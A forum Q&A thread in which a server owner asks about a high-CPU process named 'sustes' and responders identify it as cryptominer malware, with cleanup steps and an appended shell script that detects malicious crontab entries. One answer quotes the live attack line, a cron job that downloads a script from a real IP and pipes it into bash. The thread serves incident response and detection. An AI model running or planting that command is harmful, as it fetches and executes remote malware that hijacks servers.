What is this "sustes" in my process in my CPU stats?

July 11, 2018
Apache Ubuntu 16.04

Under CPU Processes I have one thread running high at 54.50 %
I have no clue what it means...

3 Answers

Hello friend!

I'm afraid I have not heard of a process that identifies itself by that name, but that would generally be true of many applications that I have not personally used so it does not necessarily mean that anything is working other than in the intended way.

The short version of what this means is that software on your server is utilizing the CPU, and under an ideal scenario you would know what that software was in relation to how you set up the server and what that server's role is.

Going a bit deeper, I would SSH in and run "top" and then press C to reveal more about the process, particularly under the Command column. You should be able to see in more detail where it is being run from and what user on the system is running it. From there your path is a bit more of an unwritten story, as what you do next depends heavily on what you want to do and whether or not that is something that should be running on your system.

Kind Regards,
Jarland

We've found a similar script/process.
Turned out our test server had been compromised and it's actually been mining cryptocurrency.

Check the crontab file for the following:

* * * * * wget -q -O - http://192.99.142.248:8220/mr.sh | bash -sh > /dev/null 2>&1

Edit: not sure if I should remove the IP address

This is cryptominer malware. You must delete it from your droplets.
First delete this cron job. It runs under the user which called the process "sustes". You can find this username with "top" or in the output of this command:
ps aux | grep sustes

Then look at the cron jobs of this user:
crontab -u username -l
If it has this string

then edit this cron job
crontab -e -u username

or delete it entirely with
crontab -r -u username

Then delete these files
/var/tmp/sustes
/var/tmp/sustes3
/var/tmp/wc.conf
/var/tmp/123
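
A defender-side check for the cleanup steps in the answers above, as an added example that is not part of any poster's answer: it flags crontab lines that pipe a downloaded script into a shell (the shape of the cron entry quoted above) and lists which of the four /var/tmp files are present. The function names and the spool path /var/spool/cron/crontabs (the Debian/Ubuntu default) are assumptions of this example.

```shell
#!/bin/sh
# Added example: audit per-user crontabs and the dropped files named in this thread.

# File paths listed in the answer above.
SUSTES_FILES="/var/tmp/sustes /var/tmp/sustes3 /var/tmp/wc.conf /var/tmp/123"

# Read cron text on stdin; print active (non-comment) lines that pipe
# wget/curl output straight into a shell.
suspicious_cron_lines() {
  grep -Ev '^[[:space:]]*(#|$)' |
    grep -E '(wget|curl)[^|]*[|][[:space:]]*(ba|da|z)?sh([[:space:]]|$)' || true
}

# Scan every crontab in a spool directory and prefix each hit with the
# owning user (the spool file name). Default path is an assumption.
scan_spool() {
  dir="${1:-/var/spool/cron/crontabs}"
  for tab in "$dir"/*; do
    [ -f "$tab" ] || continue
    user=$(basename "$tab")
    suspicious_cron_lines < "$tab" | while IFS= read -r line; do
      printf '%s: %s\n' "$user" "$line"
    done
  done
  return 0
}

# Print which of the known files exist. An optional root prefix lets the
# check run against a mounted disk image instead of the live system.
present_sustes_files() {
  root="${1:-}"
  for f in $SUSTES_FILES; do
    if [ -e "$root$f" ]; then
      echo "$f"
    fi
  done
  return 0
}

# Audit the live system (run as root to read other users' crontabs).
scan_spool
present_sustes_files
```

Any user name printed by scan_spool is the account to inspect with crontab -u before removing files; /etc/crontab and /etc/cron.d can be fed to suspicious_cron_lines the same way.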
